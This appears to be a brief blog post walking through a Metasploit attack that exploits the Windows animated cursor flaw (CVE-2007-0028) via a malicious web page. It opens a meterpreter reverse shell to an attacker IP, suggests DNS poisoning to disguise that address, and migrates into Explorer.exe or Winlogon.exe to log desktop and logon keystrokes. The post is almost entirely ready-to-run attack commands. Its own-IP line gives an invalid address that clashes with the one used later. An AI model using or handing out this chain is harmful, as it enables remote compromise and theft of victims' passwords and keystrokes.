Yours: 131.107.1.522 (BackTrack 3 with Metasploit 3.x)
Step 1: Exploit with Windows Animated Cursor Vulnerability (CVE-2007-0028)
cd /pentest/exploits/msf3
./msfconsole
msf > use windows/browser/ani_loadimage_chunksize
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set SRVHOST 131.107.1.252
msf > set LHOST 131.107.1.252
msf > set SRVPORT 80
msf > set LPORT 443
msf > set URIPATH /you_win.html
msf > exploit
Step 2: Connect to the attacker's machine via IE 6
http://131.107.1.252/you_win.html
Note:
Use the DNS poisoning or cache poisoning to change the IP address to a domain name.
Example:
www.abc.com 131.107.1.252
http://www.abc.com/you_win.html
Once you've got the connection, type:
msf > sessions -l
msf > sessions -i 1
Step 3: Migrate the processes (Explorer.exe or Winlogon.exe)
Note:
- Migrate the Explorer.exe if you want to capture the Desktop keystrokes.
- Migrate the Winlogon.exe if you want to capture the Windows Logon keystrokes.
List all processes...
meterpreter > ps
Migrate Explorer.exe or Winlogon.exe (use the PID number)
meterpreter > migrate
Start the Keystroke Logger...
meterpreter > keyscan_start
Display the captured keystrokes...
meterpreter > keyscan_dump
Stop the Keystroke Logger...
meterpreter > keyscan_stop
No comments:
Post a Comment